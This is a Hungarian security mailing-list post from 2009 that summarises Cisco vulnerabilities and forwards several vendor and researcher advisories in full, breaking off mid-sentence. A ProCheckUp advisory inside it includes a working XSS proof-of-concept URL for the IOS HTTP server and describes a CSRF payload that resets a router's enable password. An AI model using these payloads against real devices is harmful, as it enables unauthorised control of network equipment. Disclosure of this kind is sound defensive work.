[guru] Cisco biztonsagi frissitesek
DATE: Tue, 03 Mar 2009 23:55:55 +0100
A Cisco Application Control Engine Global Site Selector (GSS) DNS
szolgáltatása megfelelően preparált DNS kérés segítségével
összeomlasztható.
XSS hibákat találtak a Cisco IOS beépített http szerverében.
A 7960G és 7940G Cisco Unified IP telefonok (SIP protokoll esetén)
nem megfelelően dolgozza fel az RTP fejléceket, a telefonok ettől
DoS-olhatóak.
A Cisco ONS 15300 Edge Optical Transport Platform, a Cisco ONS 15454
Optical Transport Platform, a Cisco ONS 15454 SDH Multiservice Platform
és a Cisco ONS 15600 Multiservice Switching Platform eszközei egy
megfelelően preparált TCP csomag segítségével DoS-olható.
Az IronPort PXE Encryption információ szivárgási hibát tartalmaz, a
támadó titkosított email-ekhez férhet hozzá. Az adminisztrációs felület
CSRF (cross-site request forgery) hibákat tartalmaz, a támadó módosíthatja
más felhasználók beállításait.
A Cisco Security Manager és a Cisco IPS Event Viewer (IEV) együttes
használata biztonsági hibát tartalmaz, amennyiben az IEV fut, akkor
a Cisco Security Manager adatbázison és a szerveren root hozzáférést
nyújtó tcp portok nyílnak.
A Cisco Unified Communications Manager (régebben Cisco CallManager)
DoS lehetőséget tartalmaz a Certificate Authority Proxy Function (CAPF)
funkcionalitásában.
Több biztonsági hibát (különböző DoS lehetőségek, valamint egy privilégium
szerzési lehetőség, mikor is a Lobby Admin joggal rendelkező felhasználó
teljes adminisztrátori jogokat szerezhet) is találtak a Cisco Wireless LAN
Controllers (TLCs), Cisco Catalyst 6500 Wireless Services Modules (WiSMs),
és Cisco Catalyst 3750 Integrated Wireless LAN Controller eszközökben.
A Cisco Unified MeetingPlace Web Conferencing szerverének azonosítási
rendszere hibás, a támadó egy megfelelően preparált URL segítségével
kikerülheti az azonosítási fázist.
A Cisco ACE Application Control Engine Module, a Cisco ACE 4710 Application
Control Engine Cisco ACE Module és a Cisco ACE 4710 Application Control
Engine termékei több biztonsági hibát is tartalmaznak (default felhasználó
és jelszó segítségével admin jogú hozzáférés, hibás jogosultság ellenőrzés
a parancssoros felületen, DoS lehetőség megfelelően preparált SSH valamint
SNMP kérés esetén.
Több biztonsági hibát is találtak a Cisco Application Networking Manager
(ANM) és Cisco Application Control Engine (ACE) Device Manager
alkalmazásokban (directory traversal hibák, default felhasználó létezése,
default MySQL felhasználó létezése, Java applet-en át a konfigurációs
állományokhoz hozzá lehet férni, vagy a rendszer leállítható).
XSS hibát találtak a Cisco Unified MeetingPlace Web Conferencing
szoftverben.
--- Begin Message ---
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
Cisco Security Advisory: Cisco Global Site Selector Appliances DNS
Vulnerability
Advisory ID: cisco-sa-20090107-gss
http://www.cisco.com/warp/public/707/cisco-sa-20090107-gss.shtml
Revision 1.0
For Public Release 2009 January 07 1600 UTC (GMT)
- ---------------------------------------------------------------------
Summary
=======
The Cisco Application Control Engine Global Site Selector (GSS)
contains a vulnerability when processing specific Domain Name System
(DNS) requests that may lead to a crash of the DNS service on the
GSS.
Cisco has released free software updates that address this
vulnerability.
A workaround that mitigates this vulnerability is available.
This advisory is posted at
http://www.cisco.com/warp/public/707/cisco-sa-20090107-gss.shtml
Affected Products
=================
All versions of GSS system software prior to 3.0(1) are affected by
this vulnerability. If the GSS is configured with the optional Cisco
Network Registrar (CNR) software, the device is not vulnerable.
Vulnerable Products
+------------------
The following GSS products are affected by this vulnerability:
* Cisco GSS 4480 Global Site Selector
* Cisco GSS 4490 Global Site Selector
* Cisco GSS 4491 Global Site Selector
* Cisco GSS 4492R Global Site Selector
In order to determine the software that runs on a GSS device, users
should log in to the device and issue the show version command to
display the system software banner. The version is indicated on the
line starting with Version. The following example shows a GSS that
runs system software 2.0(1):
gss.cisco.com#show version
Global Site Selector (GSS)
Model Number: GSS-4491-k9
Copyright (c) 1999-2007 by Cisco Systems, Inc.
Version 2.0(1)
Uptime: 19 Hours 18 Minutes and 14 seconds
gss.cisco.com#
In order to determine if CNR is enabled on the GSS device, users
should log in to the device and issue the show running-config | grep
cnr command to display the system CNR configuration. If CNR is
enabled, cnr enable will be displayed in the output. If CNR is
disabled, no cnr enable will be displayed. The following example
shows a GSS that does not have CNR enabled:
GSS.cisco.com#show running-config | grep cnr
no cnr enable
GSS.cisco.com#
Products Confirmed Not Vulnerable
+--------------------------------
The following products have been confirmed not vulnerable:
* Cisco Global Site Selector using interaction with Cisco Network
Registrar
* Cisco Application Control Engine Module
* Cisco Network Registrar
* Cisco Content Services Switch (CSS)
No other Cisco products are currently known to be affected by this
vulnerability.
Details
=======
The Cisco GSS platform allows customers to leverage global content
deployment across multiple distributed and mirrored data locations,
optimizing site selection, improving Domain Name System (DNS)
responsiveness, and ensuring data center availability.
The GSS is inserted into the traditional DNS hierarchy and is closely
integrated with the Cisco CSS, Cisco Content Switching Module (CSM),
or third-party server load balancers (SLBs) to monitor the health and
load of the SLBs in customers data centers. The GSS uses this
information and user-specified routing algorithms to select the
best-suited and least-loaded data center in real time.
A vulnerability exists in the GSS when processing a specific sequence
of DNS requests. An exploit of the vulnerability may result in a
crash of the DNS service on the GSS.
When the DNS server crashes, an error message will appear in the logs
similar to the following example:
Dec 18 04:47:21 gss NMR-6-LAUNCHSVR_EXIT[27261] dnsserver' has exited [ExitUnknown(139)]"
This vulnerability is documented in Cisco Bug ID: CSCsj70093
This vulnerability has been assigned the Common Vulnerabilities and
Exposures (CVE) identifier CVE-2008-3819.
Vulnerability Scoring Details
==============================
Cisco has provided scores for the vulnerabilities in this advisory
based on the Common Vulnerability Scoring System (CVSS). The CVSS
scoring in this Security Advisory is done in accordance with CVSS
version 2.0.
CVSS is a standards-based scoring method that conveys vulnerability
severity and helps determine urgency and priority of response.
Cisco has provided a base and temporal score. Customers can then
compute environmental scores to assist in determining the impact of
the vulnerability in individual networks.
Cisco has provided an FAQ to answer additional questions regarding
CVSS at
http://www.cisco.com/web/about/security/intelligence/cvss-qandas.html
Cisco has also provided a CVSS calculator to help compute the
environmental impact for individual networks at
http://intellishield.cisco.com/security/alertmanager/cvss
CSCsj70093: GSS DNS service may crash when processing specific DNS
requests.
CVSS Base Score - 7.8
Access Vector : Network
Access Complexity : Low
Authentication : None
Confidentiality Impact: None
Integrity Impact : None
Availability Impact : Complete
CVSS Temporal Score - 6.4
Exploitability : Functional
Remediation Level : Official-Fix
Report Confidence : Confirmed
Impact
======
Successful exploitation of the vulnerability may result in a crash of
the GSS DNS service. Repeated exploitation may result in a sustained
denial of service (DoS) attack.
Software Versions and Fixes
===========================
When considering software upgrades, also consult
http://www.cisco.com/go/psirt and any subsequent advisories to
determine exposure and a complete upgrade solution.
In all cases, customers should exercise caution to be certain the
devices to be upgraded contain sufficient memory and that current
hardware and software configurations will continue to be supported
properly by the new release. If the information is not clear, contact
the Cisco Technical Assistance Center (TAC) or your contracted
maintenance provider for assistance.
+---------------------------------------+
| GSS | First Fixed | Recommended |
| Major | Release | Release |
| Version | | |
|---------+---------------+-------------|
| | Vulnerable; | |
| 1.x(y) | Migrate to | 3.0(2) |
| | 3.0(1) or | |
| | later | |
|---------+---------------+-------------|
| | Vulnerable; | |
| 2.x(y) | Migrate to | 3.0(2) |
| | 3.0(1) or | |
| | later | |
|---------+---------------+-------------|
| 3.x(y) | Not | |
| | Vulnerable | |
+---------------------------------------+
GSS fixed system software is available for download from
http://www.cisco.com/cgi-bin/tablebuild.pl/gss-3des?psrtdcat20e2
Workarounds
===========
A workaround for this vulnerability includes setting the property
"ServerConfig.dnsserver.returnError" to disabled (or zero). The
following example shows how to set the property to disabled. It is
enabled by default:
GSS#config terminal
GSS(config)#$sserver.returnError 0
GSS(config)#property set ServerConfig.dnsserver.returnError 0
GSS(config)#exit
GSS#write memory
Note: Negative responses (NXDOMAIN and NODATA) will not be sent out
by the GSS with this setting disabled. Also, by using the DNS server
statistics (show statistics dns global), it will not be possible to
differentiate between the NXDOMAIN or NODATA mismatches because both
of these will increment the DNSQueriesUnmatched counter.
Obtaining Fixed Software
========================
Cisco has released free software updates that address these
vulnerabilities. Prior to deploying software, customers should
consult their maintenance provider or check the software for feature
set compatibility and known issues specific to their environment.
Customers may only install and expect support for the feature sets
they have purchased. By installing, downloading, accessing or
otherwise using such software upgrades, customers agree to be bound
by the terms of Cisco's software license terms found at
http://www.cisco.com/en/US/products/prod_warranties_item09186a008088e31f.html
or as otherwise set forth at Cisco.com Downloads at
http://www.cisco.com/public/sw-center/sw-usingswc.shtml
Do not contact psirt@cisco.com or security-alert@cisco.com for
software upgrades.
Customers with Service Contracts
+-------------------------------
Customers with contracts should obtain upgraded software through
their regular update channels. For most customers, this means that
upgrades should be obtained through the Software Center on Cisco's
worldwide website at http://www.cisco.com.
Customers using Third Party Support Organizations
+------------------------------------------------
Customers whose Cisco products are provided or maintained through
prior or existing agreements with third-party support organizations,
such as Cisco Partners, authorized resellers, or service providers
should contact that support organization for guidance and assistance
with the appropriate course of action in regards to this advisory.
The effectiveness of any workaround or fix is dependent on specific
customer situations, such as product mix, network topology, traffic
behavior, and organizational mission. Due to the variety of affected
products and releases, customers should consult with their service
provider or support organization to ensure any applied workaround or
fix is the most appropriate for use in the intended network before it
is deployed.
Customers without Service Contracts
+----------------------------------
Customers who purchase direct from Cisco but do not hold a Cisco
service contract, and customers who purchase through third-party
vendors but are unsuccessful in obtaining fixed software through
their point of sale should acquire upgrades by contacting the Cisco
Technical Assistance Center (TAC). TAC contacts are as follows.
* +1 800 553 2447 (toll free from within North America)
* +1 408 526 7209 (toll call from anywhere in the world)
* e-mail: tac@cisco.com
Customers should have their product serial number available and be
prepared to give the URL of this notice as evidence of entitlement to
a free upgrade. Free upgrades for non-contract customers must be
requested through the TAC.
Refer to http://www.cisco.com/en/US/support/tsd_cisco_worldwide_contacts.html
for additional TAC contact information, including localized
telephone numbers, and instructions and e-mail addresses for use
in various languages.
Exploitation and Public Announcements
=====================================
The Cisco PSIRT is aware of active exploitations where malicious use
of the vulnerability described in this advisory has occurred.
This vulnerability was discovered by investigating customer TAC
service requests.
Status of this Notice: FINAL
============================
THIS DOCUMENT IS PROVIDED ON AN "AS IS" BASIS AND DOES NOT IMPLY ANY
KIND OF GUARANTEE OR WARRANTY, INCLUDING THE WARRANTIES OF
MERCHANTABILITY OR FITNESS FOR A PARTICULAR USE. YOUR USE OF THE
INFORMATION ON THE DOCUMENT OR MATERIALS LINKED FROM THE DOCUMENT IS
AT YOUR OWN RISK. CISCO RESERVES THE RIGHT TO CHANGE OR UPDATE THIS
DOCUMENT AT ANY TIME.
A stand-alone copy or Paraphrase of the text of this document that
omits the distribution URL in the following section is an
uncontrolled copy, and may lack important information or contain
factual errors.
Distribution
============
This advisory is posted on Cisco's worldwide website at :
http://www.cisco.com/warp/public/707/cisco-sa-20090107-gss.shtml
In addition to worldwide web posting, a text version of this notice
is clear-signed with the Cisco PSIRT PGP key and is posted to the
following e-mail and Usenet news recipients.
* cust-security-announce@cisco.com
* first-bulletins@lists.first.org
* bugtraq@securityfocus.com
* vulnwatch@vulnwatch.org
* cisco@spot.colorado.edu
* cisco-nsp@puck.nether.net
* full-disclosure@lists.grok.org.uk
* comp.dcom.sys.cisco@newsgate.cisco.com
Future updates of this advisory, if any, will be placed on Cisco's
worldwide website, but may or may not be actively announced on
mailing lists or newsgroups. Users concerned about this problem are
encouraged to check the above URL for any updates.
Revision History
================
+---------------------------------------+
| Revision | | Initial |
| 1.0 | 2009-January-07 | public |
| | | release |
+---------------------------------------+
Cisco Security Procedures
=========================
Complete information on reporting security vulnerabilities in Cisco
products, obtaining assistance with security incidents, and
registering to receive security information from Cisco, is available
on Cisco's worldwide website at
http://www.cisco.com/en/US/products/products_security_vulnerability_policy.html.
This includes instructions for press inquiries regarding Cisco
security notices. All Cisco security advisories are available at
http://www.cisco.com/go/psirt
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.8 (Darwin)
iEYEARECAAYFAklk0GkACgkQ86n/Gc8U/uC6pgCcCgB77Z4FQULx2eaebHFGykP5
9f4AoIpdxXVA12D+KcCAxNZphQk/ICNc
=YvIZ
-----END PGP SIGNATURE-----
--- End Message ---
--- Begin Message ---
PR08-19: XSS on Cisco IOS HTTP Server
Date found: 1st August 2008
Vendor contacted: 1st August 2008
Advisory publicly released: 14th January 2009
Severity: Medium
Credits: Adrian Pastor of ProCheckUp Ltd (www.procheckup.com)
Description:
Cisco IOS HTTP server is vulnerable to XSS within invalid parameters
processed by the "/ping" server-side binary/script.
Consequences:
An attacker may be able to cause execution of malicious scripting code
in the browser of a user who clicks on a link to the HTTP server of a
Cisco device.
This type of attack can result in non-persistent defacement of the
target admin interface, or the redirection of confidential information
to unauthorised third parties. i.e.: by scraping the data returned by
the '/level/15/exec/-/show/run/CR' URL via the XMLHttpRequest object.
It might also be possible to perform administrative changes by
submitting forged commands (CSRF) within the payload of the XSS attack.
i.e.: injecting an 'img' tag which points to
'/level/15/configure/-/enable/secret/newpass' would change the enable
password to 'newpass'.
Notes:
1. The victim administrator needs to be currently authenticated for this
vulnerability to be exploitable
2. In order to exploit this vulnerability successfully, the attacker
only needs to know the IP address of the Cisco device. There is NO need
to have access to the IOS HTTP server
Proof of concept (PoC):
http://192.168.100.1/ping?<script>alert("Running+code+within+the_context+of+"%2bdocument.domain)</script>
Content of HTML body returned:
<BODY BGCOLOR=#FFFFFF><H2>test-router</H2><HR><DT>Error: URL syntax:
?<script>alert("Running code within the_context of
"+document.domain)</script></BODY>
Successfully tested on:
Cisco 1803
Cisco IOS Software, C180X Software (C180X-ADVIPSERVICESK9-M), Version
12.4(6)T7, RELEASE SOFTWARE (fc5)
Assigned Cisco Bug ID#:
CSCsr72301
CVE reference:
CVE-2008-3821
References:
http://www.procheckup.com/vulnerability_manager/vulnerabilities/pr08-19
http://www.cisco.com/warp/public/707/cisco-sr-20090114-http.shtml
Fix:
Please see Cisco advisory for information on available updates.
Legal:
Copyright 2009 ProCheckUp Ltd. All rights reserved.
Permission is granted for copying and circulating this Bulletin to the
Internet community for the purpose of alerting them to problems, if and
only if the Bulletin is not changed or edited in any way, is attributed
to ProCheckUp indicating this web page URL, and provided such
reproduction and/or distribution is performed for non-commercial purposes.
Any other use of this information is prohibited. ProCheckUp is not
liable for any misuse of this information by any third party. ProCheckUp
is not responsible for the content of external Internet sites.
--- End Message ---
--- Begin Message ---
Title:
------
* Cisco Unified IP Phone 7960G and 7940G (SIP) RTP Header Vulnerability
Summary:
--------
* The Cisco Unified IP Phone 7960G and 7940G (SIP) do not correctly
parse some malformed RTP headers leading to a deterministic denial of
service
Assigned CVE:
-------------
* CVE-2008-4444
Details:
--------
* SIP protocol is used to set up calls between phones. Once the call is
established, the media content is carried by the RTP protocol. A remote
attacker could send a specially crafted RTP packet against a Cisco SIP
phone in such a way as to cause the phone to reboot.
Attack Impact:
--------------
* Denial-of-service (reboot or hang-up) and possibly remote arbitrary
code execution
Attack Vector:
--------------
* Have the possibility to setup a call to the targeted phone and carry
RTP frame to the vulnerable device
* Have access to the VoIP network while a call is established and inject
RTP frames
Timeline:
---------
* 2008-06-13 - Vulnerability reported to Cisco
* 2008-06-16 - Full details sent to Cisco
* 2008-10-21 - Cisco released a patched firmware
* 2009-01-14 - Release of this security advisory
Affected Products:
------------------
* Cisco Unified IP Phone 7960G and 7940G (SIP) with P0S3-08-9-00
firmware. Cisco released a patched firmware on October 21, 2008 which is
described in the bug identifier CSCsu22285 (Cisco Unified IP Phone 7960G
and 7940G (SIP) Release Notes for Firmware Release 8.10).
Credits:
--------
* This vulnerability was discovered by Gabriel Campana and Laurent Butti
from France Telecom / Orange
--- End Message ---
--- Begin Message ---
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
Cisco Security Advisory: Cisco ONS Platform Crafted Packet
Vulnerability
Advisory ID: cisco-sa-20090114-ons
http://www.cisco.com/warp/public/707/cisco-sa-20090114-ons.shtml
Revision 1.0
For Public Release 2009 January 14 1600 UTC (GMT)
- ---------------------------------------------------------------------
Summary
=======
The Cisco ONS 15300 series Edge Optical Transport Platform, the Cisco
ONS 15454 Optical Transport Platform, the Cisco ONS 15454 SDH
Multiservice Platform, and the Cisco ONS 15600 Multiservice Switching
Platform contains a vulnerability when processing TCP traffic streams
that may result in a reload of the device control card.
Cisco has released free software updates that address this
vulnerability.
There are no workarounds that mitigate this vulnerability. Several
mitigations exist that can limit the exposure of this vulnerability.
This advisory is posted at
http://www.cisco.com/warp/public/707/cisco-sa-20090114-ons.shtml
Affected Products
=================
Vulnerable Products
+------------------
The following Cisco ONS products are vulnerable if running affected
software versions:
* Cisco ONS 15310-CL and 15310-MA
* Cisco ONS 15327
* Cisco ONS 15454 and 15454 SDH
* Cisco ONS 15600
Consult the section "Software Versions and Fixes" within this
advisory for affected software versions. To determine your software
version, view the Help > About window on the CTC management
software).
Products Confirmed Not Vulnerable
+--------------------------------
The following Cisco ONS products are confirmed not vulnerable:
* Cisco ONS 15800 Series
* Cisco ONS 15500 Series Extended Service Platform
* Cisco ONS 15302
* Cisco ONS 15305
* Cisco ONS 15200 Series Metro DWDM Systems
* Cisco ONS 15190 Series IP Transport Concentrator
No other Cisco products are currently known to be affected by this
vulnerability.
Details
=======
The affected Cisco 15310-CL, 15310-MA, ONS 15327, ONS 15454, ONS
15454 SDH, and ONS 15600 hardware is managed through the CTX,
CTX2500, XTC, TCC/TCC+/TCC2/TCC2P, TCCi/TCC2/TCC2P, and TSC control
cards respectively. These control cards are usually connected to a
Data Communications Network (DCN). In this context the term DCN is
used to denote the network that transports management information
between a management station and the network entity (NE). This
definition of DCN is sometimes referred to as Management
Communication Network (MCN). The DCN is usually physically or
logically separated from the optical data network and isolated from
the Internet. This limits the exposure to the exploitation of this
vulnerability from the Internet.
A crafted stream of TCP traffic to the control cards on a node will
result in a reset of the corresponding control cards on this node. A
complete 3-way handshake is required on any open TCP port to be able
to exploit this vulnerability.
The timing for the data channels traversing the switch is provided by
the control cards.
When an active and a standby Cisco ONS 15310-MA, ONS 15310-CL, ONS
15327, ONS 15454 or ONS 15454 SDH control card reloads at the same
time, the synchronous data channels traversing the switch drop
traffic until the card comes back online. Asynchronous data channels
traversing the switch are not impacted. Manageability functions
provided by the network element using the CTX, CTX2500, XTC or TCC/
TCC+/TCC2/TCC2P control cards are not available until the control
card comes back online.
On the Cisco ONS 15600 hardware, whenever both the active and standby
control cards are rebooting at the same time, there is no impact to
the data channels traversing the switch because the TSC performs a
software reset which does not impact the timing being provided by the
TSC for the data channels.
Manageability functions provided by the network element through the
TSC control cards are not available until the control card comes back
online.
This vulnerability is documented in Cisco bug ID CSCsr41128
and has been assigned Common Vulnerabilities and Exposures (CVE)
identifier CVE-2008-3818.
Vulnerability Scoring Details
=============================
Cisco has provided scores for the vulnerabilities in this advisory
based on the Common Vulnerability Scoring System (CVSS). The CVSS
scoring in this Security Advisory is done in accordance with CVSS
version 2.0.
CVSS is a standards-based scoring method that conveys vulnerability
severity and helps determine urgency and priority of response.
Cisco has provided a base and temporal score. Customers can then
compute environmental scores to assist in determining the impact of
the vulnerability in individual networks.
Cisco has provided an FAQ to answer additional questions regarding
CVSS at
http://www.cisco.com/web/about/security/intelligence/cvss-qandas.html
Cisco has also provided a CVSS calculator to help compute the
environmental impact for individual networks at
http://intellishield.cisco.com/security/alertmanager/cvss
CVSS Base Score - 7.8
Access Vector : Network
Access Complexity : Low
Authentication : None
Confidentiality Impact: None
Integrity Impact : None
Availability Impact : Complete
CVSS Temporal Score - 6.4
Exploitability : Functional
Remediation Level : Official-Fix
Report Confidence : Confirmed
Impact
======
Successful exploitation of this vulnerability will result in a reset
of the node's control card. Repeated attempts to exploit this
vulnerability could result in a sustained DoS condition, dropping the
synchronous data channels traversing the switch (Cisco ONS 15310-MA,
ONS 15310-CL, ONS 15327, ONS 15454, ONS 15454 SDH) and preventing
manageability functions provided by the network element control cards
(all ONS switches) until the control card comes back online.
Software Versions and Fixes
===========================
When considering software upgrades, also consult
http://www.cisco.com/go/psirt and any subsequent advisories to
determine exposure and a complete upgrade solution.
In all cases, customers should exercise caution to be certain the
devices to be upgraded contain sufficient memory and that current
hardware and software configurations will continue to be supported
properly by the new release. If the information is not clear, contact
the Cisco Technical Assistance Center (TAC) or your contracted
maintenance provider for assistance.
+-------------------------------------------------------------------------+
| Affected Major Release | First Fixed Release |
|---------------------------------+---------------------------------------|
| 7.0 | Note: Releases prior to 7.0.2 are not |
| | vulnerable. First fixed in 7.0.7 |
|---------------------------------+---------------------------------------|
| 7.2 | Note: Releases prior to 7.2.2 are not |
| | vulnerable. First fixed in 7.2.3 |
|---------------------------------+---------------------------------------|
| 8.0 | Vulnerable; migrate to 8.5.3 or |
| | later. |
|---------------------------------+---------------------------------------|
| 8.5 | Note: Releases prior to 8.5.1 are not |
| | vulnerable. First fixed in 8.5.3 |
|---------------------------------+---------------------------------------|
| 9.0 | Not vulnerable. |
+-------------------------------------------------------------------------+
Note: Releases prior to 7.0 are not affected by this vulnerability.
Workarounds
===========
There are no workarounds for this vulnerability. The following
general mitigation actions help prevent remote exploitation:
* Isolate DCN:
Ensuring the DCN is physically or logically separated from the
customer network and isolated from the Internet will limit the
exposure to the exploitation of these vulnerabilities from the
Internet or customer networks.
* Apply Transit Access Control Lists:
Apply access control lists (ACLs) on routers / switches /
firewalls installed in front of the vulnerable network devices
such that TCP/IP traffic destined for the CTX, CTX2500, XTC, TCC2
/TCC2+/TCC2P, or TSC control cards on the ONS is allowed only
from the network management workstations.
For examples on how to apply ACLs on Cisco routers, refer to the
white paper "Transit Access Control Lists: Filtering at Your
Edge", which is available at the following link:
http://www.cisco.com/en/US/customer/tech/tk648/tk361/technologies_white_paper09186a00801afc76.shtml
Additional mitigations that can be deployed on Cisco devices within
the network are available in the Cisco Applied Mitigation Bulletin
companion document for this advisory, which is available at the
following link:
http://www.cisco.com/warp/public/707/cisco-amb-20090114-ons.shtml
Obtaining Fixed Software
========================
Cisco has released free software updates that address these
vulnerabilities. Prior to deploying software, customers should
consult their maintenance provider or check the software for feature
set compatibility and known issues specific to their environment.
Customers may only install and expect support for the feature sets
they have purchased. By installing, downloading, accessing or
otherwise using such software upgrades, customers agree to be bound
by the terms of Cisco's software license terms found at
http://www.cisco.com/en/US/products/prod_warranties_item09186a008088e31f.html
or as otherwise set forth at Cisco.com Downloads at
http://www.cisco.com/public/sw-center/sw-usingswc.shtml
Do not contact psirt@cisco.com or security-alert@cisco.com for
software upgrades.
Customers with Service Contracts
+-------------------------------
Customers with contracts should obtain upgraded software through
their regular update channels. For most customers, this means that
upgrades should be obtained through the Software Center on Cisco's
worldwide website at http://www.cisco.com
Customers using Third Party Support Organizations
+------------------------------------------------
Customers whose Cisco products are provided or maintained through
prior or existing agreements with third-party support organizations,
such as Cisco Partners, authorized resellers, or service providers
should contact that support organization for guidance and assistance
with the appropriate course of action in regards to this advisory.
The effectiveness of any workaround or fix is dependent on specific
customer situations, such as product mix, network topology, traffic
behavior, and organizational mission. Due to the variety of affected
products and releases, customers should consult with their service
provider or support organization to ensure any applied workaround or
fix is the most appropriate for use in the intended network before it
is deployed.
Customers without Service Contracts
+----------------------------------
Customers who purchase direct from Cisco but do not hold a Cisco
service contract, and customers who purchase through third-party
vendors but are unsuccessful in obtaining fixed software through
their point of sale should acquire upgrades by contacting the Cisco
Technical Assistance Center (TAC). TAC contacts are as follows.
* +1 800 553 2447 (toll free from within North America)
* +1 408 526 7209 (toll call from anywhere in the world)
* e-mail: tac@cisco.com
Customers should have their product serial number available and be
prepared to give the URL of this notice as evidence of entitlement to
a free upgrade. Free upgrades for non-contract customers must be
requested through the TAC.
Refer to http://www.cisco.com/en/US/support/tsd_cisco_worldwide_contacts.html
for additional TAC contact information, including localized
telephone numbers, and instructions and e-mail addresses for use in
various languages.
Exploitation and Public Announcements
=====================================
The Cisco PSIRT is not aware of any public announcements or malicious
use of the vulnerability described in this advisory.
This vulnerability was found by reviewing Cisco TAC service requests.
Status of this Notice: FINAL
============================
THIS DOCUMENT IS PROVIDED ON AN "AS IS" BASIS AND DOES NOT IMPLY ANY
KIND OF GUARANTEE OR WARRANTY, INCLUDING THE WARRANTIES OF
MERCHANTABILITY OR FITNESS FOR A PARTICULAR USE. YOUR USE OF THE
INFORMATION ON THE DOCUMENT OR MATERIALS LINKED FROM THE DOCUMENT IS
AT YOUR OWN RISK. CISCO RESERVES THE RIGHT TO CHANGE OR UPDATE THIS
DOCUMENT AT ANY TIME.
A stand-alone copy or Paraphrase of the text of this document that
omits the distribution URL in the following section is an
uncontrolled copy, and may lack important information or contain
factual errors.
Distribution
============
This advisory is posted on Cisco's worldwide website at:
http://www.cisco.com/warp/public/707/cisco-sa-20090114-ons.shtml
In addition to worldwide web posting, a text version of this notice
is clear-signed with the Cisco PSIRT PGP key and is posted to the
following e-mail and Usenet news recipients.
* cust-security-announce@cisco.com
* first-bulletins@lists.first.org
* bugtraq@securityfocus.com
* vulnwatch@vulnwatch.org
* cisco@spot.colorado.edu
* cisco-nsp@puck.nether.net
* full-disclosure@lists.grok.org.uk
* comp.dcom.sys.cisco@newsgate.cisco.com
Future updates of this advisory, if any, will be placed on Cisco's
worldwide website, but may or may not be actively announced on
mailing lists or newsgroups. Users concerned about this problem are
encouraged to check the above URL for any updates.
Revision History
================
+---------------------------------------+
| Revision | | Initial |
| 1.0 | 2009-January-14 | public |
| | | release |
+---------------------------------------+
Cisco Security Procedures
=========================
Complete information on reporting security vulnerabilities in Cisco
products, obtaining assistance with security incidents, and
registering to receive security information from Cisco, is available
on Cisco's worldwide website at
http://www.cisco.com/en/US/products/products_security_vulnerability_policy.html
This includes instructions for press inquiries regarding Cisco
security notices. All Cisco security advisories are available at
http://www.cisco.com/go/psirt
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.8 (Darwin)
iEYEARECAAYFAkluC5MACgkQ86n/Gc8U/uCIiwCfb0TgaYDql8VEjtERKMaqgHOm
h0oAniEObgEKjHbo+CHnJxfFFKhCr17o
=7xLg
-----END PGP SIGNATURE-----
--- End Message ---
--- Begin Message ---
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
Cisco Security Response: Cisco IOS Cross-Site Scripting
Vulnerabilities
http://www.cisco.com/warp/public/707/cisco-sr-20090114-http.shtml
Revision 1.0
For Public Release 2009 January 14 1600 UTC (GMT)
- ---------------------------------------------------------------------
Cisco Response
==============
Two separate Cisco IOS Hypertext Transfer Protocol (HTTP) cross-site
scripting (XSS) vulnerabilities have been reported to Cisco by two
independent researchers. ProCheckup has posted a Security Advisory
titled "XSS on Cisco IOS HTTP Server" posted at
http://www.procheckup.com/vulnerability_manager/vulnerabilities/pr08-19
Cisco would like to thank Adrian Pastor and Richard J. Brain of
ProCheckUp and Nobuhiro Tsuji of NTT Data Security Corporation with
co-operation of JPCert.
This Cisco Security Response is posted at the following link:
http://www.cisco.com/warp/public/707/cisco-sr-20090114-http.shtml
Additional Information
======================
This response covers two separate cross-site scripting
vulnerabilities within the Cisco IOS Hypertext Transfer Protocol
(HTTP) server (including HTTP secure server - here after referred to
as purely HTTP Server) and applies to all Cisco products that run
Cisco IOS Software versions 11.0 through 12.4 with the HTTP server
enabled. A system that contains the IOS HTTP server or HTTP secure
server, but does not have it enabled, is not affected.
To determine if the HTTP server is running on your device, issue the
show ip http server status | include status and the show ip http
server secure status | include status commands at the prompt and look
for output similar to:
Router#show ip http server status | include status
HTTP server status: Enabled
HTTP secure server status: Enabled
If the device is not running the HTTP server, you should see output
similar to:
Router#show ip http server status | include status
HTTP server status: Disabled
HTTP secure server status: Disabled
These vulnerabilities are documented in the following Cisco bug IDs:
* Cisco bug ID CSCsi13344 - XSS in IOS HTTP Server
Special Characters are not escaped in URL strings sent to the
HTTP server.
* Cisco bug ID CSCsr72301 - XSS in IOS HTTP Server (ping parameter)
Special Characters are not escaped in URL strings sent to the
HTTP server, via the ping parameter. The ping parameter is used
both by external applications such as Router and Security Device
Manager (SDM) as well as a direct HTTP session to Cisco IOS http
server. This vulnerability affects 12.1E based trains and all
Cisco IOS releases after 12.2(13)T.
These vulnerabilities are independent of each other. For a full
solution, download a Cisco IOS version that contains the fixes for
both Cisco bug IDs. These vulnerabilities have been assigned Common
Vulnerabilities and Exposures (CVE) identifier CVE-2008-3821.
Workaround
+---------
If the HTTP server is not used for any legitimate purposes on the
device, it is a best practice to disable it by issuing the following
commands in configure mode:
no ip http server
no ip http secure-server
If the HTTP server is required, it is a recommended best practice to
control which hosts may access the HTTP server to only trusted
sources. To control which hosts can access the HTTP server, you can
apply an access list to the HTTP server. To apply an access list to
the HTTP server, use the following command in global configuration
mode:
ip http access-class {access-list-number | access-list-name}
The following example shows an access list that allows only trusted
hosts to access the Cisco IOS HTTP server:
ip access-list standard 20
permit 192.168.1.0 0.0.0.255
remark "Above is a trusted subnet"
remark "Add further trusted subnets or hosts below"
! (Note: all other access implicitly denied)
! (Apply the access-list to the http server)
ip http access-class 20
For additional information on configuring the Cisco IOS HTTP server,
consult Using the Cisco Web Browser User Interface.
For additional information on cross-site scripting attacks and the
methods used to exploit these vulnerabilities, please refer to the
Cisco Applied Mitigation Bulletin "Understanding Cross-Site Scripting
(XSS) Threat Vectors", which is available at the following link:
http://www.cisco.com/warp/public/707/cisco-amb-20060922-understanding-xss.shtml
Further Problem Description
+--------------------------
This vulnerability is about escaping characters in the URL that are
sent to the HTTP server. This vulnerability is different from the
vulnerability reported in Cisco bug ID CSCsc64976. The fix for this
vulnerability is to escape special characters in the URL string
echoed in the response generated by the web exec application.
Software Version and Fixes
+-------------------------
When considering software upgrades, also consult
http://www.cisco.com/go/psirt and any subsequent advisories to
determine exposure and a complete upgrade solution.
In all cases, customers should exercise caution to be certain the
